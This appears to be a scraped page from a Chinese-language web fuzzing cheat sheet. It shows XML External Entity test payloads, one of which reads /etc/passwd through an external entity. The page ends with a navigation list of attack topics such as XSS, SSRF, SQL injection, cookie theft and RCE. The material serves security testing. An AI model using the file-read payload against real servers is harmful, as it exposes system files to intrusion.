Web-Fast-Fuzz
XXE
测试方法
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">
]>
<methodCall><methodName>&test;</methodName></methodCall><?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test "nice string bro">]
>
<methodCall><methodName>&test;</methodName></methodCall><?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "file:///etc/passwd">]
>
<methodCall><methodName>&test;</methodName></methodCall>webgoat8
测试方法
MUTILLIDAE
OUT OF BAND
基础测试
读文件
使用FTP读文件
XSS
文件上传的XSS
SVG
XML
CSP BYPASS
常用的payload
AUTH CRED
偷Cookie
测试session劫持
FILTER BYPASS RESOURCES
基于POST的XSS
DOM XSS
SSRF
SQL注入
会话固定
CSRF
文件上传漏洞
无限制的文件上传
CORS配置错误
测试心脏出血漏洞
偷私钥
重定向
CRLF注入
模板注入
RCE
PHP中的匿名函数RCE
PHP实验
PHP交互式SHELL
CSV注入
有用的脚本
IDORS
服务器端包含注入
点击劫持
攻击JSON
反序列化漏洞
工具
测试不安全的JWT
LFI
子域名探测技术
最后更新于
这有帮助吗?

